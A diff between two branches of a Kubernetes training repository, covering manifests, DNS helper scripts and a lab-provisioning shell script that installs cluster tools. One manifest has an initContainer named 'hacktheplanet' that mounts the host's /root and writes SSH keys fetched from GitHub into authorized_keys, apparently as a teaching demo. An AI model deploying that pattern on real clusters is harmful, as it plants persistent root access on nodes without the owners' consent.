mirror of
https://github.com/jpetazzo/container.training.git
synced 2026-03-02 17:30:20 +00:00
Compare commits
2 Commits
2024-12-bo
...
2023-05-en
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
6a8e00fc7d | ||
|
|
e8c2b29c8f |
@@ -1,6 +1,6 @@
|
||||
FROM ruby:alpine
|
||||
RUN apk add --update build-base curl
|
||||
RUN gem install sinatra --version '~> 3'
|
||||
RUN gem install sinatra
|
||||
RUN gem install thin
|
||||
ADD hasher.rb /
|
||||
CMD ["ruby", "hasher.rb"]
|
||||
|
||||
@@ -16,7 +16,8 @@ spec:
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- operator: Exists
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
@@ -26,7 +27,7 @@ spec:
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
|
||||
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
@@ -1,13 +0,0 @@
|
||||
apiVersion: policy/v1
|
||||
kind: PodDisruptionBudget
|
||||
metadata:
|
||||
name: my-pdb
|
||||
spec:
|
||||
#minAvailable: 2
|
||||
#minAvailable: 90%
|
||||
maxUnavailable: 1
|
||||
#maxUnavailable: 10%
|
||||
selector:
|
||||
matchLabels:
|
||||
app: my-app
|
||||
|
||||
@@ -1,27 +0,0 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: sysctl
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: sysctl
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: sysctl
|
||||
spec:
|
||||
tolerations:
|
||||
- operator: Exists
|
||||
initContainers:
|
||||
- name: sysctl
|
||||
image: alpine
|
||||
securityContext:
|
||||
privileged: true
|
||||
command:
|
||||
- sysctl
|
||||
- fs.inotify.max_user_instances=99999
|
||||
containers:
|
||||
- name: pause
|
||||
image: registry.k8s.io/pause:3.8
|
||||
|
||||
@@ -59,27 +59,6 @@ You don't **have to** install the CLI tools of the cloud provider(s) that you wa
|
||||
|
||||
If you want to provide your cloud credentials through other means, you will have to adjust the Terraform configuration files in `terraform/provider-config` accordingly.
|
||||
|
||||
Here is where we look for credentials for each provider:
|
||||
|
||||
- AWS: Terraform defaults; see [AWS provider documentation][creds-aws] (for instance, you can use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` environment variables, or AWS config and profile files)
|
||||
- Azure: Terraform defaults; see [AzureRM provider documentation][creds-azure] (typically, you can authenticate with the `az` CLI and Terraform will pick it up automatically)
|
||||
- Civo: CLI configuration file (`~/.civo.json`)
|
||||
- Digital Ocean: CLI configuration file (`~/.config/doctl/config.yaml`)
|
||||
- Exoscale: CLI configuration file (`~/.config/exoscale/exoscale.toml`)
|
||||
- Google Cloud: FIXME, note that the project name is currently hard-coded to `prepare-tf`
|
||||
- Hetzner: CLI configuration file (`~/.config/hcloud/cli.toml`)
|
||||
- Linode: CLI configuration file (`~/.config/linode-cli`)
|
||||
- OpenStack: you will need to write a tfvars file (check [that exemple](terraform/virtual-machines/openstack/tfvars.example))
|
||||
- Oracle: Terraform defaults; see [OCI provider documentation][creds-oci] (for instance, you can set up API keys; or you can use a short-lived token generated by the OCI CLI with `oci session authenticate`)
|
||||
- OVH: Terraform defaults; see [OVH provider documentation][creds-ovh] (this typically involves setting up 5 `OVH_...` environment variables)
|
||||
- Scaleway: Terraform defaults; see [Scaleway provider documentation][creds-scw] (for instance, you can set environment variables, but it will also automatically pick up CLI authentication from `~/.config/scw/config.yaml`)
|
||||
|
||||
[creds-aws]: https://registry.terraform.io/providers/hashicorp/aws/latest/docs#authentication-and-configuration
|
||||
[creds-azure]: https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs#authenticating-to-azure
|
||||
[creds-oci]: https://docs.oracle.com/en-us/iaas/Content/API/SDKDocs/terraformproviderconfiguration.htm#authentication
|
||||
[creds-ovh]: https://registry.terraform.io/providers/ovh/ovh/latest/docs#provider-configuration
|
||||
[creds-scw]: https://registry.terraform.io/providers/scaleway/scaleway/latest/docs#authentication
|
||||
|
||||
## General Workflow
|
||||
|
||||
- fork/clone repo
|
||||
|
||||
@@ -21,11 +21,6 @@ digitalocean-pvc)
|
||||
jq '.[] | select(.name | startswith("pvc-")) | .id' |
|
||||
xargs -n1 -P10 doctl compute volume delete --force
|
||||
;;
|
||||
scaleway-pvc)
|
||||
scw instance volume list --output json |
|
||||
jq '.[] | select(.name | contains("_pvc-")) | .id' |
|
||||
xargs -n1 -P10 scw instance volume delete
|
||||
;;
|
||||
*)
|
||||
echo "Unknown combination of provider ('$1') and resource ('$2')."
|
||||
;;
|
||||
|
||||
@@ -10,22 +10,13 @@ fi
|
||||
. ~/creds/creds.cloudflare.dns
|
||||
|
||||
cloudflare() {
|
||||
case "$1" in
|
||||
GET|POST|DELETE)
|
||||
METHOD="$1"
|
||||
shift
|
||||
;;
|
||||
*)
|
||||
METHOD=""
|
||||
;;
|
||||
esac
|
||||
URI=$1
|
||||
shift
|
||||
http --ignore-stdin $METHOD https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
|
||||
http https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
|
||||
}
|
||||
|
||||
_list_zones() {
|
||||
cloudflare zones?per_page=100 | jq -r .result[].name
|
||||
cloudflare zones | jq -r .result[].name
|
||||
}
|
||||
|
||||
_get_zone_id() {
|
||||
@@ -41,15 +32,6 @@ _populate_zone() {
|
||||
done
|
||||
}
|
||||
|
||||
_clear_zone() {
|
||||
ZONE_ID=$(_get_zone_id $1)
|
||||
for RECORD_ID in $(
|
||||
cloudflare zones/$ZONE_ID/dns_records | jq -r .result[].id
|
||||
); do
|
||||
cloudflare DELETE zones/$ZONE_ID/dns_records/$RECORD_ID
|
||||
done
|
||||
}
|
||||
|
||||
_add_zone() {
|
||||
cloudflare zones "name=$1"
|
||||
}
|
||||
|
||||
@@ -1,9 +1,7 @@
|
||||
#!/bin/sh
|
||||
|
||||
set -eu
|
||||
|
||||
# https://open-api.netlify.com/#tag/dnsZone
|
||||
[ "${1-}" ] || {
|
||||
[ "$1" ] || {
|
||||
echo ""
|
||||
echo "Add a record in Netlify DNS."
|
||||
echo "This script is hardcoded to add a record to container.training".
|
||||
@@ -14,13 +12,13 @@ set -eu
|
||||
echo "$0 del <recordid>"
|
||||
echo ""
|
||||
echo "Example to create a A record for eu.container.training:"
|
||||
echo "$0 add eu A 185.145.250.0"
|
||||
echo "$0 add eu 185.145.250.0"
|
||||
echo ""
|
||||
exit 1
|
||||
}
|
||||
|
||||
NETLIFY_CONFIG_FILE=~/.config/netlify/config.json
|
||||
if ! [ "${DOMAIN-}" ]; then
|
||||
if ! [ "$DOMAIN" ]; then
|
||||
DOMAIN=container.training
|
||||
fi
|
||||
|
||||
@@ -51,29 +49,27 @@ ZONE_ID=$(netlify dns_zones |
|
||||
|
||||
_list() {
|
||||
netlify dns_zones/$ZONE_ID/dns_records |
|
||||
jq -r '.[] | select(.type=="A" or .type=="AAAA") | [.hostname, .type, .value, .id] | @tsv' |
|
||||
sort |
|
||||
column --table
|
||||
jq -r '.[] | select(.type=="A") | [.hostname, .type, .value, .id] | @tsv'
|
||||
}
|
||||
|
||||
_add() {
|
||||
NAME=$1.$DOMAIN
|
||||
TYPE=$2
|
||||
VALUE=$3
|
||||
ADDR=$2
|
||||
|
||||
|
||||
# It looks like if we create two identical records, then delete one of them,
|
||||
# Netlify DNS ends up in a weird state (the name doesn't resolve anymore even
|
||||
# though it's still visible through the API and the website?)
|
||||
|
||||
if netlify dns_zones/$ZONE_ID/dns_records |
|
||||
jq '.[] | select(.hostname=="'$NAME'" and .type=="'$TYPE'" and .value=="'$VALUE'")' |
|
||||
jq '.[] | select(.hostname=="'$NAME'" and .type=="A" and .value=="'$ADDR'")' |
|
||||
grep .
|
||||
then
|
||||
echo "It looks like that record already exists. Refusing to create it."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
netlify dns_zones/$ZONE_ID/dns_records type=$TYPE hostname=$NAME value=$VALUE ttl=300
|
||||
netlify dns_zones/$ZONE_ID/dns_records type=A hostname=$NAME value=$ADDR ttl=300
|
||||
|
||||
netlify dns_zones/$ZONE_ID/dns_records |
|
||||
jq '.[] | select(.hostname=="'$NAME'")'
|
||||
@@ -92,7 +88,7 @@ case "$1" in
|
||||
_list
|
||||
;;
|
||||
add)
|
||||
_add $2 $3 $4
|
||||
_add $2 $3
|
||||
;;
|
||||
del)
|
||||
_del $2
|
||||
|
||||
@@ -1,29 +1,13 @@
|
||||
#!/bin/sh
|
||||
#
|
||||
# Baseline resource usage per vcluster in our usecase:
|
||||
# 500 MB RAM
|
||||
# 10% CPU
|
||||
# (See https://docs.google.com/document/d/1n0lwp6rQKQUIuo_A5LQ1dgCzrmjkDjmDtNj1Jn92UrI)
|
||||
# PRO2-XS = 4 core, 16 gb
|
||||
|
||||
PROVIDER=scaleway
|
||||
|
||||
case "$PROVIDER" in
|
||||
linode)
|
||||
export TF_VAR_node_size=g6-standard-6
|
||||
export TF_VAR_location=eu-west
|
||||
;;
|
||||
scaleway)
|
||||
export TF_VAR_node_size=PRO2-XS
|
||||
export TF_VAR_location=fr-par-2
|
||||
;;
|
||||
esac
|
||||
|
||||
./labctl create --mode mk8s --settings settings/konk.env --provider $PROVIDER --tag konk
|
||||
# deploy big cluster
|
||||
TF_VAR_node_size=g6-standard-6 \
|
||||
TF_VAR_nodes_per_cluster=5 \
|
||||
TF_VAR_location=eu-west \
|
||||
./labctl create --mode mk8s --settings settings/mk8s.env --provider linode --tag konk
|
||||
|
||||
# set kubeconfig file
|
||||
export KUBECONFIG=~/kubeconfig
|
||||
cp tags/konk/stage2/kubeconfig.101 $KUBECONFIG
|
||||
cp tags/konk/stage2/kubeconfig.101 ~/kubeconfig
|
||||
|
||||
# set external_ip labels
|
||||
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="ExternalIP")].address}{"\n"}{end}' |
|
||||
@@ -32,12 +16,4 @@ while read node address; do
|
||||
done
|
||||
|
||||
# vcluster all the things
|
||||
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students 50
|
||||
|
||||
# install prometheus stack because that's cool
|
||||
helm upgrade --install --repo https://prometheus-community.github.io/helm-charts \
|
||||
--namespace prom-system --create-namespace \
|
||||
kube-prometheus-stack kube-prometheus-stack
|
||||
|
||||
# and also fix sysctl
|
||||
kubectl apply -f ../k8s/sysctl.yaml --namespace kube-system
|
||||
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students 27
|
||||
|
||||
@@ -57,7 +57,7 @@ need_tag() {
|
||||
if [ ! -d "tags/$TAG" ]; then
|
||||
die "Tag $TAG not found (directory tags/$TAG does not exist)."
|
||||
fi
|
||||
for FILE in mode provider settings.env status; do
|
||||
for FILE in settings.env ips.txt; do
|
||||
if [ ! -f "tags/$TAG/$FILE" ]; then
|
||||
warning "File tags/$TAG/$FILE not found."
|
||||
fi
|
||||
|
||||
@@ -19,22 +19,20 @@ _cmd_cards() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
OPTIONS_FILE=$2
|
||||
[ -f "$OPTIONS_FILE" ] || die "Please specify a YAML options file as 2nd argument."
|
||||
OPTIONS_FILE_PATH="$(readlink -f "$OPTIONS_FILE")"
|
||||
die FIXME
|
||||
|
||||
# This will process logins.jsonl to generate two files: cards.pdf and cards.html
|
||||
# This will process ips.txt to generate two files: ips.pdf and ips.html
|
||||
(
|
||||
cd tags/$TAG
|
||||
../../../lib/make-login-cards.py "$OPTIONS_FILE_PATH"
|
||||
../../../lib/ips-txt-to-html.py settings.yaml
|
||||
)
|
||||
|
||||
ln -sf ../tags/$TAG/cards.html www/$TAG.html
|
||||
ln -sf ../tags/$TAG/cards.pdf www/$TAG.pdf
|
||||
ln -sf ../tags/$TAG/ips.html www/$TAG.html
|
||||
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
|
||||
|
||||
info "Cards created. You can view them with:"
|
||||
info "xdg-open tags/$TAG/cards.html tags/$TAG/cards.pdf (on Linux)"
|
||||
info "open tags/$TAG/cards.html (on macOS)"
|
||||
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
|
||||
info "open tags/$TAG/ips.html (on macOS)"
|
||||
info "Or you can start a web server with:"
|
||||
info "$0 www"
|
||||
}
|
||||
@@ -128,7 +126,6 @@ set number
|
||||
set shiftwidth=2
|
||||
set softtabstop=2
|
||||
set nowrap
|
||||
set laststatus=2
|
||||
SQRL
|
||||
|
||||
pssh -I "sudo -u $USER_LOGIN tee /home/$USER_LOGIN/.tmux.conf" <<SQRL
|
||||
@@ -259,9 +256,7 @@ _cmd_create() {
|
||||
terraform init
|
||||
echo tag = \"$TAG\" >> terraform.tfvars
|
||||
echo how_many_clusters = $STUDENTS >> terraform.tfvars
|
||||
if [ "$CLUSTERSIZE" ]; then
|
||||
echo nodes_per_cluster = $CLUSTERSIZE >> terraform.tfvars
|
||||
fi
|
||||
echo nodes_per_cluster = $CLUSTERSIZE >> terraform.tfvars
|
||||
for RETRY in 1 2 3; do
|
||||
if terraform apply -auto-approve; then
|
||||
touch terraform.ok
|
||||
@@ -325,11 +320,10 @@ _cmd_clusterize() {
|
||||
pssh "
|
||||
set -e
|
||||
grep PSSH_ /etc/ssh/sshd_config || echo 'AcceptEnv PSSH_*' | sudo tee -a /etc/ssh/sshd_config
|
||||
grep KUBECOLOR_ /etc/ssh/sshd_config || echo 'AcceptEnv KUBECOLOR_*' | sudo tee -a /etc/ssh/sshd_config
|
||||
sudo systemctl restart ssh.service"
|
||||
|
||||
pssh -I < tags/$TAG/clusters.tsv "
|
||||
grep -w \$PSSH_HOST | tr '\t' '\n' > /tmp/cluster"
|
||||
pssh -I < tags/$TAG/clusters.txt "
|
||||
grep -w \$PSSH_HOST | tr ' ' '\n' > /tmp/cluster"
|
||||
pssh "
|
||||
echo \$PSSH_HOST > /tmp/ipv4
|
||||
head -n 1 /tmp/cluster | sudo tee /etc/ipv4_of_first_node
|
||||
@@ -350,10 +344,6 @@ _cmd_clusterize() {
|
||||
done < /tmp/cluster
|
||||
"
|
||||
|
||||
while read line; do
|
||||
printf '{"login": "%s", "password": "%s", "ipaddrs": "%s"}\n' "$USER_LOGIN" "$USER_PASSWORD" "$line"
|
||||
done < tags/$TAG/clusters.tsv > tags/$TAG/logins.jsonl
|
||||
|
||||
echo cluster_ok > tags/$TAG/status
|
||||
}
|
||||
|
||||
@@ -401,7 +391,7 @@ _cmd_docker() {
|
||||
##VERSION## https://github.com/docker/compose/releases
|
||||
COMPOSE_VERSION=v2.11.1
|
||||
COMPOSE_PLATFORM='linux-$(uname -m)'
|
||||
|
||||
|
||||
# Just in case you need Compose 1.X, you can use the following lines.
|
||||
# (But it will probably only work for x86_64 machines.)
|
||||
#COMPOSE_VERSION=1.29.2
|
||||
@@ -430,23 +420,10 @@ _cmd_kubebins() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
if [ "$KUBEVERSION" = "" ]; then
|
||||
KUBEVERSION="$(curl -fsSL https://cdn.dl.k8s.io/release/stable.txt | sed s/^v//)"
|
||||
fi
|
||||
|
||||
##VERSION##
|
||||
case "$KUBEVERSION" in
|
||||
1.19.*)
|
||||
ETCD_VERSION=v3.4.13
|
||||
CNI_VERSION=v0.8.7
|
||||
;;
|
||||
*)
|
||||
ETCD_VERSION=v3.5.10
|
||||
CNI_VERSION=v1.3.0
|
||||
;;
|
||||
esac
|
||||
|
||||
K8SBIN_VERSION="v$KUBEVERSION"
|
||||
ETCD_VERSION=v3.4.13
|
||||
K8SBIN_VERSION=v1.19.11 # Can't go to 1.20 because it requires a serviceaccount signing key.
|
||||
CNI_VERSION=v0.8.7
|
||||
ARCH=${ARCHITECTURE-amd64}
|
||||
pssh --timeout 300 "
|
||||
set -e
|
||||
@@ -470,41 +447,30 @@ _cmd_kubebins() {
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kubepkgs "Install Kubernetes packages (kubectl, kubeadm, kubelet)"
|
||||
_cmd_kubepkgs() {
|
||||
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
|
||||
_cmd_kube() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# Prior September 2023, there was a single Kubernetes package repo that
|
||||
# contained packages for all versions, so we could just add that repo
|
||||
# and install whatever was the latest version available there.
|
||||
# Things have changed (versions after September 2023, e.g. 1.28.3 are
|
||||
# not in the old repo) and now there is a different repo for each
|
||||
# minor version, so we need to figure out what minor version we are
|
||||
# installing to add the corresponding repo.
|
||||
if [ "$KUBEVERSION" = "" ]; then
|
||||
KUBEVERSION="$(curl -fsSL https://cdn.dl.k8s.io/release/stable.txt | sed s/^v//)"
|
||||
fi
|
||||
KUBEREPOVERSION="$(echo $KUBEVERSION | cut -d. -f1-2)"
|
||||
|
||||
# Since the new repo doesn't have older versions, add a safety check here.
|
||||
MINORVERSION="$(echo $KUBEVERSION | cut -d. -f2)"
|
||||
if [ "$MINORVERSION" -lt 24 ]; then
|
||||
die "Cannot install kubepkgs for versions before 1.24."
|
||||
fi
|
||||
|
||||
pssh "
|
||||
sudo tee /etc/apt/preferences.d/kubernetes <<EOF
|
||||
if [ "$KUBEVERSION" ]; then
|
||||
CLUSTER_CONFIGURATION_KUBERNETESVERSION='kubernetesVersion: "v'$KUBEVERSION'"'
|
||||
pssh "
|
||||
sudo tee /etc/apt/preferences.d/kubernetes <<EOF
|
||||
Package: kubectl kubeadm kubelet
|
||||
Pin: version $KUBEVERSION-*
|
||||
Pin-Priority: 1000
|
||||
EOF"
|
||||
fi
|
||||
|
||||
# As of February 27th, 2023, packages.cloud.google.com seems broken
|
||||
# (serves HTTP 500 errors for the GPG key), so let's pre-load that key.
|
||||
pssh -I "sudo apt-key add -" < lib/kubernetes-apt-key.gpg
|
||||
|
||||
# Install packages
|
||||
pssh --timeout 200 "
|
||||
curl -fsSL https://pkgs.k8s.io/core:/stable:/v$KUBEREPOVERSION/deb/Release.key |
|
||||
gpg --dearmor | sudo tee /etc/apt/keyrings/kubernetes-apt-keyring.gpg &&
|
||||
echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v$KUBEREPOVERSION/deb/ /' |
|
||||
#curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
|
||||
#sudo apt-key add - &&
|
||||
echo deb http://apt.kubernetes.io/ kubernetes-xenial main |
|
||||
sudo tee /etc/apt/sources.list.d/kubernetes.list"
|
||||
pssh --timeout 200 "
|
||||
sudo apt-get update -q &&
|
||||
@@ -512,21 +478,8 @@ EOF"
|
||||
sudo apt-mark hold kubelet kubeadm kubectl &&
|
||||
kubeadm completion bash | sudo tee /etc/bash_completion.d/kubeadm &&
|
||||
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl &&
|
||||
echo 'alias k=kubecolor' | sudo tee /etc/bash_completion.d/k &&
|
||||
echo 'alias k=kubectl' | sudo tee /etc/bash_completion.d/k &&
|
||||
echo 'complete -F __start_kubectl k' | sudo tee -a /etc/bash_completion.d/k"
|
||||
}
|
||||
|
||||
_cmd kubeadm "Setup kubernetes clusters with kubeadm"
|
||||
_cmd_kubeadm() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
if [ "$KUBEVERSION" ]; then
|
||||
CLUSTER_CONFIGURATION_KUBERNETESVERSION='kubernetesVersion: "v'$KUBEVERSION'"'
|
||||
IGNORE_SYSTEMVERIFICATION="- SystemVerification"
|
||||
IGNORE_SWAP="- Swap"
|
||||
IGNORE_IPTABLES="- FileContent--proc-sys-net-bridge-bridge-nf-call-iptables"
|
||||
fi
|
||||
|
||||
# Install a valid configuration for containerd
|
||||
# (first, the CRI interface needs to be re-enabled;
|
||||
@@ -547,9 +500,6 @@ bootstrapTokens:
|
||||
nodeRegistration:
|
||||
ignorePreflightErrors:
|
||||
- NumCPU
|
||||
$IGNORE_SYSTEMVERIFICATION
|
||||
$IGNORE_SWAP
|
||||
$IGNORE_IPTABLES
|
||||
---
|
||||
kind: JoinConfiguration
|
||||
apiVersion: kubeadm.k8s.io/v1beta3
|
||||
@@ -561,9 +511,6 @@ discovery:
|
||||
nodeRegistration:
|
||||
ignorePreflightErrors:
|
||||
- NumCPU
|
||||
$IGNORE_SYSTEMVERIFICATION
|
||||
$IGNORE_SWAP
|
||||
$IGNORE_IPTABLES
|
||||
---
|
||||
kind: KubeletConfiguration
|
||||
apiVersion: kubelet.config.k8s.io/v1beta1
|
||||
@@ -646,31 +593,6 @@ _cmd_kubetools() {
|
||||
;;
|
||||
esac
|
||||
|
||||
# Install ArgoCD CLI
|
||||
##VERSION## https://github.com/argoproj/argo-cd/releases/latest
|
||||
URL=https://github.com/argoproj/argo-cd/releases/latest/download/argocd-linux-${ARCH}
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/argocd ]; then
|
||||
sudo curl -o /usr/local/bin/argocd -fsSL $URL
|
||||
sudo chmod +x /usr/local/bin/argocd
|
||||
argocd completion bash | sudo tee /etc/bash_completion.d/argocd
|
||||
argocd version --client
|
||||
fi"
|
||||
|
||||
# Install Flux CLI
|
||||
##VERSION## https://github.com/fluxcd/flux2/releases
|
||||
FLUX_VERSION=2.3.0
|
||||
FILENAME=flux_${FLUX_VERSION}_linux_${ARCH}
|
||||
URL=https://github.com/fluxcd/flux2/releases/download/v$FLUX_VERSION/$FILENAME.tar.gz
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/flux ]; then
|
||||
curl -fsSL $URL |
|
||||
sudo tar -C /usr/local/bin -zx flux
|
||||
sudo chmod +x /usr/local/bin/flux
|
||||
flux completion bash | sudo tee /etc/bash_completion.d/flux
|
||||
flux --version
|
||||
fi"
|
||||
|
||||
# Install kubectx and kubens
|
||||
pssh "
|
||||
set -e
|
||||
@@ -702,7 +624,7 @@ EOF
|
||||
|
||||
# Install stern
|
||||
##VERSION## https://github.com/stern/stern/releases
|
||||
STERN_VERSION=1.29.0
|
||||
STERN_VERSION=1.22.0
|
||||
FILENAME=stern_${STERN_VERSION}_linux_${ARCH}
|
||||
URL=https://github.com/stern/stern/releases/download/v$STERN_VERSION/$FILENAME.tar.gz
|
||||
pssh "
|
||||
@@ -724,7 +646,7 @@ EOF
|
||||
|
||||
# Install kustomize
|
||||
##VERSION## https://github.com/kubernetes-sigs/kustomize/releases
|
||||
KUSTOMIZE_VERSION=v5.4.1
|
||||
KUSTOMIZE_VERSION=v4.5.7
|
||||
URL=https://github.com/kubernetes-sigs/kustomize/releases/download/kustomize/${KUSTOMIZE_VERSION}/kustomize_${KUSTOMIZE_VERSION}_linux_${ARCH}.tar.gz
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/kustomize ]; then
|
||||
@@ -755,16 +677,6 @@ EOF
|
||||
aws-iam-authenticator version
|
||||
fi"
|
||||
|
||||
# Install jless (jless.io)
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/jless ]; then
|
||||
##VERSION##
|
||||
sudo apt-get install -y libxcb-render0 libxcb-shape0 libxcb-xfixes0
|
||||
wget https://github.com/PaulJuliusMartinez/jless/releases/download/v0.9.0/jless-v0.9.0-x86_64-unknown-linux-gnu.zip
|
||||
unzip jless-v0.9.0-x86_64-unknown-linux-gnu
|
||||
sudo mv jless /usr/local/bin
|
||||
fi"
|
||||
|
||||
# Install the krew package manager
|
||||
pssh "
|
||||
if [ ! -d /home/$USER_LOGIN/.krew ]; then
|
||||
@@ -776,31 +688,21 @@ EOF
|
||||
echo export PATH=/home/$USER_LOGIN/.krew/bin:\\\$PATH | sudo -u $USER_LOGIN tee -a /home/$USER_LOGIN/.bashrc
|
||||
fi"
|
||||
|
||||
# Install kubecolor
|
||||
KUBECOLOR_VERSION=0.4.0
|
||||
URL=https://github.com/kubecolor/kubecolor/releases/download/v${KUBECOLOR_VERSION}/kubecolor_${KUBECOLOR_VERSION}_linux_${ARCH}.tar.gz
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/kubecolor ]; then
|
||||
##VERSION##
|
||||
curl -fsSL $URL |
|
||||
sudo tar -C /usr/local/bin -zx kubecolor
|
||||
fi"
|
||||
|
||||
# Install k9s
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/k9s ]; then
|
||||
FILENAME=k9s_Linux_$ARCH.tar.gz &&
|
||||
curl -fsSL https://github.com/derailed/k9s/releases/latest/download/\$FILENAME |
|
||||
sudo tar -C /usr/local/bin -zx k9s
|
||||
sudo tar -zxvf- -C /usr/local/bin k9s
|
||||
k9s version
|
||||
fi"
|
||||
|
||||
# Install popeye
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/popeye ]; then
|
||||
FILENAME=popeye_Linux_$ARCH.tar.gz &&
|
||||
FILENAME=popeye_Linux_$HERP_DERP_ARCH.tar.gz &&
|
||||
curl -fsSL https://github.com/derailed/popeye/releases/latest/download/\$FILENAME |
|
||||
sudo tar -C /usr/local/bin -zx popeye
|
||||
sudo tar -zxvf- -C /usr/local/bin popeye
|
||||
popeye version
|
||||
fi"
|
||||
|
||||
@@ -810,10 +712,10 @@ EOF
|
||||
# But the install script is not arch-aware (see https://github.com/tilt-dev/tilt/pull/5050).
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/tilt ]; then
|
||||
TILT_VERSION=0.33.13
|
||||
TILT_VERSION=0.22.15
|
||||
FILENAME=tilt.\$TILT_VERSION.linux.$TILT_ARCH.tar.gz
|
||||
curl -fsSL https://github.com/tilt-dev/tilt/releases/download/v\$TILT_VERSION/\$FILENAME |
|
||||
sudo tar -C /usr/local/bin -zx tilt
|
||||
sudo tar -zxvf- -C /usr/local/bin tilt
|
||||
tilt completion bash | sudo tee /etc/bash_completion.d/tilt
|
||||
tilt version
|
||||
fi"
|
||||
@@ -855,8 +757,7 @@ EOF
|
||||
fi"
|
||||
|
||||
##VERSION## https://github.com/bitnami-labs/sealed-secrets/releases
|
||||
KUBESEAL_VERSION=0.26.2
|
||||
URL=https://github.com/bitnami-labs/sealed-secrets/releases/download/v${KUBESEAL_VERSION}/kubeseal-${KUBESEAL_VERSION}-linux-${ARCH}.tar.gz
|
||||
KUBESEAL_VERSION=0.17.4
|
||||
#case $ARCH in
|
||||
#amd64) FILENAME=kubeseal-linux-amd64;;
|
||||
#arm64) FILENAME=kubeseal-arm64;;
|
||||
@@ -864,13 +765,13 @@ EOF
|
||||
#esac
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/kubeseal ]; then
|
||||
curl -fsSL $URL |
|
||||
sudo tar -C /usr/local/bin -zx kubeseal
|
||||
curl -fsSL https://github.com/bitnami-labs/sealed-secrets/releases/download/v$KUBESEAL_VERSION/kubeseal-$KUBESEAL_VERSION-linux-$ARCH.tar.gz |
|
||||
sudo tar -zxvf- -C /usr/local/bin kubeseal
|
||||
kubeseal --version
|
||||
fi"
|
||||
|
||||
##VERSION## https://github.com/vmware-tanzu/velero/releases
|
||||
VELERO_VERSION=1.13.2
|
||||
VELERO_VERSION=1.11.0
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/velero ]; then
|
||||
curl -fsSL https://github.com/vmware-tanzu/velero/releases/download/v$VELERO_VERSION/velero-v$VELERO_VERSION-linux-$ARCH.tar.gz |
|
||||
@@ -880,21 +781,13 @@ EOF
|
||||
fi"
|
||||
|
||||
##VERSION## https://github.com/doitintl/kube-no-trouble/releases
|
||||
KUBENT_VERSION=0.7.2
|
||||
KUBENT_VERSION=0.7.0
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/kubent ]; then
|
||||
curl -fsSL https://github.com/doitintl/kube-no-trouble/releases/download/${KUBENT_VERSION}/kubent-${KUBENT_VERSION}-linux-$ARCH.tar.gz |
|
||||
sudo tar -zxvf- -C /usr/local/bin kubent
|
||||
kubent --version
|
||||
fi"
|
||||
|
||||
# Ngrok. Note that unfortunately, this is the x86_64 binary.
|
||||
# We might have to rethink how to handle this for multi-arch environments.
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/ngrok ]; then
|
||||
curl -fsSL https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz |
|
||||
sudo tar -zxvf- -C /usr/local/bin ngrok
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
|
||||
@@ -942,15 +835,6 @@ _cmd_inventory() {
|
||||
FIXME
|
||||
}
|
||||
|
||||
_cmd logins "Show login information for a group of instances"
|
||||
_cmd_logins() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
|
||||
cat tags/$TAG/logins.jsonl \
|
||||
| jq -r '"\(.password)\tssh -l \(.login)\(if .port then " -p \(.port)" else "" end)\t\(.ipaddrs)"'
|
||||
}
|
||||
|
||||
_cmd maketag "Generate a quasi-unique tag for a group of instances"
|
||||
_cmd_maketag() {
|
||||
if [ -z $USER ]; then
|
||||
@@ -1001,9 +885,6 @@ _cmd_stage2() {
|
||||
cd tags/$TAG/stage2
|
||||
terraform init -upgrade
|
||||
terraform apply -auto-approve
|
||||
terraform output -raw logins_jsonl > ../logins.jsonl
|
||||
